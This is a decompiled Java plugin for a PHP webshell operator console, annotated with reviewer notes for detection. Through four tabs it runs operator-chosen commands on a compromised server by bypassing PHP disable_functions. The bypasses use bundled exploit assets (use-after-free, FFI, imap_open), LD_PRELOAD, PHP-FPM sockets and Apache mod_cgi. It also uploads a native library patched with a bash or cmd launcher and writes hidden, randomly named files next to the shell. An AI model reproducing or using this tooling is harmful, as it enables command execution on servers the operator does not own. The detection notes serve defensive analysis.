package shells.plugins.php;

import com.mysql.jdbc.MysqlErrorNumbers;
import com.sun.jna.platform.win32.WinError;
import core.Encoding;
import core.annotation.PluginAnnotation;
import core.imp.Payload;
import core.imp.Plugin;
import core.shell.ShellEntity;
import core.ui.component.RTextArea;
import core.ui.component.dialog.GOptionPane;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.Arrays;
import java.util.HashMap;
import java.util.UUID;
import javax.swing.JButton;
import javax.swing.JComboBox;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import javax.swing.JTabbedPane;
import javax.swing.JTextField;
import oracle.jdbc.driver.DatabaseError;
import org.springframework.util.AntPathMatcher;
import org.springframework.util.SystemPropertyUtils;
import util.Log;
import util.automaticBindClick;
import util.functions;
import util.http.ReqParameter;

/**
 * Decompiled operator-console plugin, registered for the {@code PhpDynamicPayload} payload.
 *
 * <p>It shows four tabs (MemBypass, EnvBypass, FPMBypass, AMCBypass). Each tab loads a bundled PHP
 * asset by name, attaches request parameters that include an operator-typed command, and submits
 * both to the remote PHP shell through the {@code P_Eval_Code} plugin (see {@link #eval}).
 *
 * <p>Reviewer notes for detection and response, limited to what this file shows:
 * <ul>
 *   <li>Remote working files are named {@code <temp path> + "." + md5(random UUID)}. The temp path
 *       defaults to the remote current directory (see {@link #init}), so the files would be
 *       dot-prefixed entries with a digest-style name next to the shell. TODO confirm that
 *       {@code functions.md5} returns a hex string.</li>
 *   <li>Only the {@code php-filter-bypass} path deletes its file from this class. No deletion of
 *       {@code soFile}, {@code cmdFile} or {@code resultFile} is visible here; cleanup, if any,
 *       happens in the PHP assets, which are not part of this file.</li>
 *   <li>Parameter names set by this class: {@code cmd}, {@code so}, {@code soFile},
 *       {@code cmdFile}, {@code resultFile}, {@code fpm_host}, {@code fpm_port}, {@code shellurl}.
 *       How they are encoded on the wire is decided by {@code PhpEvalCode} and the payload, not
 *       here.</li>
 *   <li>The uploaded native library is a bundled template patched with a
 *       {@code bash <file> > <file>} or {@code cmd /c <file> > <file>} string
 *       (see {@link #generateCmd} and {@link #generateExt}).</li>
 *   <li>NOTE(review): constants taken from Spring, MySQL, Oracle and JNA classes look like the
 *       decompiler substituting same-valued library constants for plain literals. Confirm against
 *       the original class file before trusting the imports.</li>
 * </ul>
 */
@PluginAnnotation(payloadName = "PhpDynamicPayload", Name = "BypassDisableFunctions", DisplayName = "BypassDisableFunctions")
/* loaded from: input_file:shells/plugins/php/BypassDisableFunctions.class */
public class BypassDisableFunctions implements Plugin {
    // Not referenced anywhere in this class.
    private static final String CLASS_NAME = "BypassDisableFunctions.Run";
    // Entries of the MemBypass combo box; each is used as the asset file name "assets/<name>.php".
    private static final String[] BYPASS_MEM_PAYLOAD_LINUX = {"php-filter-bypass", "disfunpoc", "php-json-bypass", "php7-backtrace-bypass", "php7-gc-bypass", "php7-SplDoublyLinkedList-uaf", "procfs_bypass", "php74-FFI-BUG", "php5-imap_open", "php7-FFI", "PHP74-FFI-Serializable"};
    // Replaces the Linux list in init() when the remote host reports Windows.
    private static final String[] BYPASS_MEM_PAYLOAD_WINDOWS = {"php-filter-bypass", "php-com"};
    private static final String[] BYPASS_ENV_PAYLOAD = {"LD_PRELOAD"};
    private static final String[] BYPASS_AMC_PAYLOAD = {"Apache_mod_cgi"};
    // Suggested FPM/FastCGI endpoints for the editable address combo box: unix sockets and loopback TCP port 9000.
    private static final String[] BYPASS_FPM_ADDRESS = {"unix:///var/run/php5-fpm.sock", "unix:///var/run/php/php5-fpm.sock", "unix:///var/run/php-fpm/php5-fpm.sock", "unix:///var/run/php/php7-fpm.sock", "/var/run/php/php7.2-fpm.sock", "/tmp/php-cgi-56.sock", "/usr/local/var/run/php7.3-fpm.sock", "localhost:9000", "127.0.0.1:9000"};
    // Byte offsets into the bundled native templates, keyed "ant_x<arch>_<ext>_<start|end>"; filled in the static block.
    private static final HashMap<String, Integer> EXT_INFO = new HashMap<>();
    // Never read or written in this class.
    private boolean loadState;
    // Session state, assigned in init().
    private ShellEntity shellEntity;
    private Payload payload;
    private Encoding encoding;
    // Resolved lazily by eval() from the "P_Eval_Code" plugin.
    private PhpEvalCode phpEvalCode;
    // Root view and one panel per tab.
    private final JPanel panel = new JPanel(new BorderLayout());
    private final JTabbedPane tabbedPane = new JTabbedPane();
    private final JPanel memBypassPanel = new JPanel(new BorderLayout());
    private final JPanel envBypassPanel = new JPanel(new BorderLayout());
    private final JPanel fpmBypassPanel = new JPanel(new BorderLayout());
    private final JPanel amcBypassPanel = new JPanel(new BorderLayout());
    // MemBypass tab widgets.
    private final JComboBox<String> memPayloadComboBox = new JComboBox<>(BYPASS_MEM_PAYLOAD_LINUX);
    private final JButton memRunButton = new JButton("Run");
    private final RTextArea memResultTextArea = new RTextArea();
    private final JTextField memCommandTextField = new JTextField(35);
    private final JLabel memPayloadLabel = new JLabel("payload");
    private final JLabel memCommandLabel = new JLabel("command");
    private final JLabel memTempPathLabel = new JLabel("Temp Path");
    private final JTextField memTempPathTextField = new JTextField(30);
    private final JSplitPane memSplitPane = new JSplitPane();
    // EnvBypass tab widgets.
    private final JComboBox<String> envPayloadComboBox = new JComboBox<>(BYPASS_ENV_PAYLOAD);
    private final JButton envRunButton = new JButton("Run");
    private final RTextArea envResultTextArea = new RTextArea();
    private final JTextField envCommandTextField = new JTextField(35);
    private final JLabel envPayloadLabel = new JLabel("payload");
    private final JLabel envCommandLabel = new JLabel("command");
    private final JLabel envSoPathLabel = new JLabel("Temp Path");
    private final JTextField envTempPathTextField = new JTextField(30);
    private final JSplitPane envSplitPane = new JSplitPane();
    // FPMBypass tab widgets.
    private final JComboBox<String> fpmAddressComboBox = new JComboBox<>(BYPASS_FPM_ADDRESS);
    private final JButton fpmRunButton = new JButton("Run");
    private final RTextArea fpmResultTextArea = new RTextArea();
    private final JTextField fpmCommandTextField = new JTextField(35);
    // Label text is Chinese for "FPM/FCGI address".
    private final JLabel fpmAddressLabel = new JLabel("FPM/FCGI 地址");
    private final JLabel fpmCommandLabel = new JLabel("command");
    private final JLabel fpmSoPathLabel = new JLabel("Temp Path");
    private final JTextField fpmTempPathTextField = new JTextField(30);
    private final JSplitPane fpmSplitPane = new JSplitPane();
    // AMCBypass tab widgets; this tab has no temp-path field.
    private final JComboBox<String> amcPayloadComboBox = new JComboBox<>(BYPASS_AMC_PAYLOAD);
    private final JButton amcRunButton = new JButton("Run");
    private final RTextArea amcResultTextArea = new RTextArea();
    private final JTextField amcCommandTextField = new JTextField(35);
    private final JLabel amcPayloadLabel = new JLabel("payload");
    private final JLabel amcCommandLabel = new JLabel("command");
    private final JSplitPane amcSplitPane = new JSplitPane();

    /**
     * Lays out the four tabs. Each tab is a split pane with a row of controls on top and a
     * scrollable result area below. No session state is touched here; see {@link #init}.
     */
    public BypassDisableFunctions() {
        // Every command field is pre-filled with "whoami".
        // setOrientation(0): 0 is JSplitPane.VERTICAL_SPLIT, i.e. components stacked top/bottom.
        this.fpmCommandTextField.setAutoscrolls(true);
        this.fpmCommandTextField.setText("whoami");
        this.fpmSplitPane.setOrientation(0);
        // Editable so an endpoint outside BYPASS_FPM_ADDRESS can be typed in.
        this.fpmAddressComboBox.setEditable(true);
        this.memCommandTextField.setAutoscrolls(true);
        this.memCommandTextField.setText("whoami");
        this.memSplitPane.setOrientation(0);
        this.envCommandTextField.setAutoscrolls(true);
        this.envCommandTextField.setText("whoami");
        this.envSplitPane.setOrientation(0);
        this.amcCommandTextField.setAutoscrolls(true);
        this.amcCommandTextField.setText("whoami");
        this.amcSplitPane.setOrientation(0);
        // MemBypass tab.
        JPanel jPanel = new JPanel();
        jPanel.add(this.memPayloadLabel);
        jPanel.add(this.memPayloadComboBox);
        jPanel.add(this.memTempPathLabel);
        jPanel.add(this.memTempPathTextField);
        jPanel.add(this.memCommandLabel);
        jPanel.add(this.memCommandTextField);
        jPanel.add(this.memRunButton);
        this.memSplitPane.setTopComponent(jPanel);
        this.memSplitPane.setBottomComponent(new JScrollPane(this.memResultTextArea));
        this.memBypassPanel.add(this.memSplitPane);
        // EnvBypass tab.
        JPanel jPanel2 = new JPanel();
        jPanel2.add(this.envPayloadLabel);
        jPanel2.add(this.envPayloadComboBox);
        jPanel2.add(this.envSoPathLabel);
        jPanel2.add(this.envTempPathTextField);
        jPanel2.add(this.envCommandLabel);
        jPanel2.add(this.envCommandTextField);
        jPanel2.add(this.envRunButton);
        this.envSplitPane.setTopComponent(jPanel2);
        this.envSplitPane.setBottomComponent(new JScrollPane(this.envResultTextArea));
        this.envBypassPanel.add(this.envSplitPane);
        // FPMBypass tab.
        JPanel jPanel3 = new JPanel();
        jPanel3.add(this.fpmAddressLabel);
        jPanel3.add(this.fpmAddressComboBox);
        jPanel3.add(this.fpmSoPathLabel);
        jPanel3.add(this.fpmTempPathTextField);
        jPanel3.add(this.fpmCommandLabel);
        jPanel3.add(this.fpmCommandTextField);
        jPanel3.add(this.fpmRunButton);
        this.fpmSplitPane.setTopComponent(jPanel3);
        this.fpmSplitPane.setBottomComponent(new JScrollPane(this.fpmResultTextArea));
        this.fpmBypassPanel.add(this.fpmSplitPane);
        // AMCBypass tab.
        JPanel jPanel4 = new JPanel();
        jPanel4.add(this.amcPayloadLabel);
        jPanel4.add(this.amcPayloadComboBox);
        jPanel4.add(this.amcCommandLabel);
        jPanel4.add(this.amcCommandTextField);
        jPanel4.add(this.amcRunButton);
        this.amcSplitPane.setTopComponent(jPanel4);
        this.amcSplitPane.setBottomComponent(new JScrollPane(this.amcResultTextArea));
        this.amcBypassPanel.add(this.amcSplitPane);
        this.tabbedPane.addTab("MemBypass", this.memBypassPanel);
        this.tabbedPane.addTab("EnvBypass", this.envBypassPanel);
        this.tabbedPane.addTab("FPMBypass", this.fpmBypassPanel);
        this.tabbedPane.addTab("AMCBypass", this.amcBypassPanel);
        this.panel.add(this.tabbedPane);
    }

    /**
     * Handler for the MemBypass "Run" button: sends the selected PHP asset with the operator's
     * command as the {@code cmd} parameter and shows the response.
     *
     * <p>For {@code php-filter-bypass} the command is suffixed with a shell redirect into a
     * temp file; that file is then downloaded, decoded with the session encoding, shown in
     * place of the eval response, and deleted.
     *
     * @param actionEvent unused
     */
    private void memRunButtonClick(ActionEvent actionEvent) {
        String str = (String) this.memPayloadComboBox.getSelectedItem();
        // new String(byte[]) decodes with the platform default charset.
        String str2 = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", str)));
        String text = this.memCommandTextField.getText();
        ReqParameter reqParameter = new ReqParameter();
        // Unlike the env/fpm handlers, the temp path is not passed through functions.formatDir here,
        // so the name is exactly <field text> + "." + md5(random UUID).
        String str3 = this.memTempPathTextField.getText() + "." + functions.md5(UUID.randomUUID().toString());
        if ("php-filter-bypass".equals(str)) {
            text = String.format("%s > %s", text, str3);
        }
        reqParameter.add("cmd", text);
        this.memResultTextArea.setText(eval(str2, reqParameter));
        if ("php-filter-bypass".equals(str)) {
            // The text area is set a second time, so the eval response above is overwritten.
            this.memResultTextArea.setText(this.encoding.Decoding(this.payload.downloadFile(str3)));
            // The only remote file deletion issued by this class.
            this.payload.deleteFile(str3);
        }
    }

    /**
     * Handler for the FPMBypass "Run" button: parses the endpoint typed into the address combo box
     * and sends the {@code FPM} asset together with the patched native library and three generated
     * remote file names.
     *
     * <p>Any exception raised inside the try block is logged and its message shown in a dialog.
     * Only the statements before the try (asset load, path formatting, name generation) can
     * propagate through the declared {@code throws}.
     *
     * @param actionEvent unused
     * @throws Exception declared by the decompiled signature
     */
    private void fpmRunButtonClick(ActionEvent actionEvent) throws Exception {
        String str;
        String str2 = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", "FPM")));
        ReqParameter reqParameter = new ReqParameter();
        // presumably normalises the directory so names can be appended directly; TODO confirm in util.functions
        String formatDir = functions.formatDir(this.fpmTempPathTextField.getText());
        // Three independent random names: str3 -> cmdFile, str4 -> resultFile, str5 -> soFile.
        String str3 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str4 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str5 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        // The port stays -1 for unix-socket endpoints.
        int i = -1;
        String trim = this.fpmAddressComboBox.getEditor().getItem().toString().trim();
        try {
            if (trim.startsWith("unix")) {
                str = trim;
            // NOTE(review): AntPathMatcher.DEFAULT_PATH_SEPARATOR is "/" in Spring; likely a decompiler
            // substitution for the literal. An absolute path is treated as a unix socket.
            } else if (trim.startsWith(AntPathMatcher.DEFAULT_PATH_SEPARATOR)) {
                str = String.format("unix://%s", trim);
            } else {
                // NOTE(review): SystemPropertyUtils.VALUE_SEPARATOR is ":" in Spring; host:port form.
                // A missing or non-numeric port throws here and ends up in the catch below.
                String[] split = trim.split(SystemPropertyUtils.VALUE_SEPARATOR);
                str = split[0];
                i = Integer.valueOf(split[1]).intValue();
            }
            reqParameter.add("fpm_host", str);
            reqParameter.add("fpm_port", String.valueOf(i));
            reqParameter.add("soFile", str5);
            reqParameter.add("cmdFile", str3);
            reqParameter.add("resultFile", str4);
            // The library is patched with the launcher string built from cmdFile and resultFile.
            reqParameter.add("so", generateExt(generateCmd(str3, str4)));
            reqParameter.add("cmd", this.fpmCommandTextField.getText());
            this.fpmResultTextArea.setText(eval(str2, reqParameter));
        } catch (Exception e) {
            Log.error(e);
            GOptionPane.showMessageDialog(null, e.getMessage());
        }
    }

    /**
     * Handler for the EnvBypass "Run" button: refuses to run against a Windows host, otherwise
     * sends the selected asset with the patched native library and three generated remote file
     * names.
     *
     * @param actionEvent unused
     * @throws Exception propagated from {@link #generateExt} or the helper calls
     */
    private void envRunButtonClick(ActionEvent actionEvent) throws Exception {
        if (this.payload.isWindows()) {
            // Dialog text is Chinese for "Linux only", title "Warning".
            // presumably 2 is the warning message type, as in JOptionPane.WARNING_MESSAGE; confirm against GOptionPane
            GOptionPane.showMessageDialog(this.shellEntity.getFrame(), "仅支持Linux", "警告", 2);
            return;
        }
        String str = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", (String) this.envPayloadComboBox.getSelectedItem())));
        ReqParameter reqParameter = new ReqParameter();
        String formatDir = functions.formatDir(this.envTempPathTextField.getText());
        // str2 -> cmdFile, str3 -> resultFile; soFile gets its own random name inline below.
        String str2 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        String str3 = formatDir + "." + functions.md5(UUID.randomUUID().toString());
        reqParameter.add("soFile", formatDir + "." + functions.md5(UUID.randomUUID().toString()));
        reqParameter.add("cmdFile", str2);
        reqParameter.add("resultFile", str3);
        reqParameter.add("so", generateExt(generateCmd(str2, str3)));
        reqParameter.add("cmd", this.envCommandTextField.getText());
        this.envResultTextArea.setText(eval(str, reqParameter));
    }

    /**
     * Handler for the AMCBypass "Run" button: sends the selected asset with the operator's command
     * and the shell URL cut back to its containing directory.
     *
     * @param actionEvent unused
     * @throws Exception declared by the decompiled signature
     */
    private void amcRunButtonClick(ActionEvent actionEvent) throws Exception {
        String str = new String(functions.getResourceAsByteArray(this, String.format("assets/%s.php", (String) this.amcPayloadComboBox.getSelectedItem())));
        String url = this.shellEntity.getUrl();
        // Keep everything up to and including the last "/" (the separator constant is "/" in Spring).
        int lastIndexOf = url.lastIndexOf(AntPathMatcher.DEFAULT_PATH_SEPARATOR);
        if (lastIndexOf != -1) {
            url = url.substring(0, lastIndexOf + 1);
        }
        ReqParameter reqParameter = new ReqParameter();
        reqParameter.add("shellurl", url);
        reqParameter.add("cmd", this.amcCommandTextField.getText());
        this.amcResultTextArea.setText(eval(str, reqParameter));
    }

    /**
     * Produces the native library bytes sent as the {@code so} parameter by patching a bundled
     * template.
     *
     * <p>The template {@code assets/ant_x<64|86>.<so|dll>} is chosen from the remote architecture
     * and OS. The region between the {@code _start} and {@code _end} offsets in {@code EXT_INFO}
     * is replaced by {@code str} padded with spaces to the region's length, and the byte at the
     * end offset is set to 0. The output therefore has the same length as the template.
     *
     * <p>NOTE(review): if the bytes of {@code str} are longer than the region, the padding length
     * is negative and the array allocation throws. {@code str.getBytes()} uses the platform
     * default charset. The stream is closed only on the success path, and a missing resource
     * is not checked for.
     *
     * @param str launcher string to embed (built by {@link #generateCmd})
     * @return the patched library image
     * @throws Exception on resource read failure or the conditions noted above
     */
    private byte[] generateExt(String str) throws Exception {
        // Defaults used when the remote probes fail: 32-bit ("86") and "so".
        int i = 86;
        String str2 = "so";
        try {
            i = this.payload.isX64() ? 64 : 86;
        } catch (Exception e) {
            Log.error(e);
        }
        try {
            str2 = !this.payload.isWindows() ? "so" : "dll";
        } catch (Exception e2) {
            Log.error(e2);
        }
        // intValue = start offset, intValue2 = end offset of the reserved region.
        int intValue = EXT_INFO.get(String.format("ant_x%s_%s_start", Integer.valueOf(i), str2)).intValue();
        int intValue2 = EXT_INFO.get(String.format("ant_x%s_%s_end", Integer.valueOf(i), str2)).intValue();
        InputStream resourceAsStream = BypassDisableFunctions.class.getResourceAsStream(String.format("assets/ant_x%s.%s", Integer.valueOf(i), str2));
        // Length of the reserved region.
        int i2 = intValue2 - intValue;
        byte[] readInputStream = functions.readInputStream(resourceAsStream);
        resourceAsStream.close();
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        byte[] bytes = str.getBytes();
        // Padding that fills the rest of the region with spaces (byte 32).
        byte[] bArr = new byte[i2 - bytes.length];
        Arrays.fill(bArr, (byte) 32);
        // Zero the byte at the end offset before the tail is copied, so the region ends in a 0 byte.
        readInputStream[intValue2] = 0;
        // Output = template head + command + space padding + template tail.
        byteArrayOutputStream.write(readInputStream, 0, intValue);
        byteArrayOutputStream.write(bytes, 0, bytes.length);
        byteArrayOutputStream.write(bArr, 0, bArr.length);
        byteArrayOutputStream.write(readInputStream, intValue2, readInputStream.length - intValue2);
        return byteArrayOutputStream.toByteArray();
    }

    /**
     * Builds the launcher string embedded in the native library: {@code bash <str> > <str2>} for
     * non-Windows hosts, {@code cmd /c <str> > <str2>} for Windows. Both arguments are concatenated
     * without quoting.
     *
     * @param str remote path of the command file
     * @param str2 remote path the output is redirected to
     * @return the launcher command line
     */
    private String generateCmd(String str, String str2) {
        return !this.payload.isWindows() ? "bash " + str + " > " + str2 : "cmd /c " + str + " > " + str2;
    }

    /**
     * Submits PHP source and its parameters through the {@code P_Eval_Code} plugin, looking the
     * plugin up on first use.
     *
     * <p>If the lookup or cast fails, a dialog is shown and "" is returned. Any other
     * {@code Throwable} is swallowed without logging and also yields "", so an empty result area
     * does not distinguish "no output" from "request failed".
     *
     * @param str PHP source to evaluate remotely
     * @param reqParameter parameters sent with the request
     * @return the plugin's response, or "" on any failure
     */
    private String eval(String str, ReqParameter reqParameter) {
        try {
            if (this.phpEvalCode == null) {
                try {
                    // The repeated null check is redundant as written.
                    // NOTE(review): possibly the remains of a decompiled synchronized block; confirm.
                    if (this.phpEvalCode == null) {
                        this.phpEvalCode = (PhpEvalCode) this.shellEntity.getFrame().getPlugin("P_Eval_Code");
                    }
                } catch (Exception e) {
                    GOptionPane.showMessageDialog(this.shellEntity.getFrame(), "no find plugin P_Eval_Code!");
                    return "";
                }
            }
            return this.phpEvalCode.eval(str, reqParameter);
        } catch (Throwable th) {
            return "";
        }
    }

    /**
     * Binds the plugin to a shell session: stores the session objects, pre-fills the three
     * temp-path fields with the remote current directory, switches the MemBypass list to the
     * Windows entries when the host is Windows, and wires the buttons to their handlers.
     *
     * @param shellEntity the session this plugin instance operates on
     */
    @Override // core.imp.Plugin
    public void init(ShellEntity shellEntity) {
        this.shellEntity = shellEntity;
        this.payload = this.shellEntity.getPayloadModule();
        this.encoding = Encoding.getEncoding(this.shellEntity);
        // currentDir() is called once per field; the AMC tab has no temp-path field.
        this.envTempPathTextField.setText(this.payload.currentDir());
        this.fpmTempPathTextField.setText(this.payload.currentDir());
        this.memTempPathTextField.setText(this.payload.currentDir());
        if (this.payload.isWindows()) {
            this.memPayloadComboBox.removeAllItems();
            for (String str : BYPASS_MEM_PAYLOAD_WINDOWS) {
                this.memPayloadComboBox.addItem(str);
            }
        }
        // presumably binds each JButton field to the private "<fieldName>Click" method by reflection,
        // which would explain why the *Click handlers have no direct callers; confirm in util.automaticBindClick
        automaticBindClick.bindJButtonClick(this, this);
    }

    /**
     * Returns the root panel that holds the tabbed pane.
     *
     * @return the plugin's view
     */
    @Override // core.imp.Plugin
    public JPanel getView() {
        return this.panel;
    }

    // Start/end byte offsets of the patchable region in each bundled native template.
    // NOTE(review): the DatabaseError, WinError and MysqlErrorNumbers references are unrelated to
    // this plugin and look like decompiler substitutions for integer literals. The numeric values
    // are what matter; verify them against the original class file and the asset binaries.
    static {
        EXT_INFO.put("ant_x86_so_start", 275);
        EXT_INFO.put("ant_x86_so_end", 504);
        EXT_INFO.put("ant_x64_so_start", Integer.valueOf(DatabaseError.TTC0206));
        EXT_INFO.put("ant_x64_so_end", Integer.valueOf(WinError.ERROR_FILE_SYSTEM_LIMITATION));
        EXT_INFO.put("ant_x86_dll_start", Integer.valueOf(MysqlErrorNumbers.ER_EVENT_EXEC_TIME_IN_THE_PAST));
        EXT_INFO.put("ant_x86_dll_end", Integer.valueOf(MysqlErrorNumbers.ER_WRONG_PERFSCHEMA_USAGE));
        EXT_INFO.put("ant_x64_dll_start", 1552);
        EXT_INFO.put("ant_x64_dll_end", Integer.valueOf(MysqlErrorNumbers.ER_WRONG_SPVAR_TYPE_IN_LIMIT));
    }
}
